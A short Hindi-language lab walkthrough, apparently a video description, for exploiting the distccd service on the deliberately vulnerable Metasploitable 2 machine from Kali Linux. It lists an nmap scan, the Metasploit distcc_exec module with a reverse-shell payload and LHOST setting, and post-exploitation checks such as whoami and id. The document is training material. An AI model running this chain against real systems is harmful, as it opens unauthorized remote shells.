
इस वीडियो में Metasploitable 2 प्रणाली में distccd सेवा में कमजोरी का उपयोग करके Kali Linux के माध्यम से remote shell प्राप्त करना दिखाया गया है।
nmap -sV -p 3632 192.168.56.102
✅ परिणाम इस प्रकार होगा:
3632/tcp open distccd v1
👉 अतः distcc खुला है और इसका शोषण किया जा सकता है।
msfconsole
use exploit/unix/misc/distcc_exec
show options
आवश्यक पैरामीटर:
| Option | मान |
|---|---|
| RHOSTS | Metasploitable IP |
| RPORT | 3632 |
| PAYLOAD | cmd/unix/reverse |
set RHOSTS 192.168.56.102
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.56.101
LHOST — आपका Kali Linux IP पता
run
🎉 परिणाम
यदि सफल होता है:
[*] कमांड शेल सत्र खोला गया
शेल की जाँच करें:
whoami
uname -a
id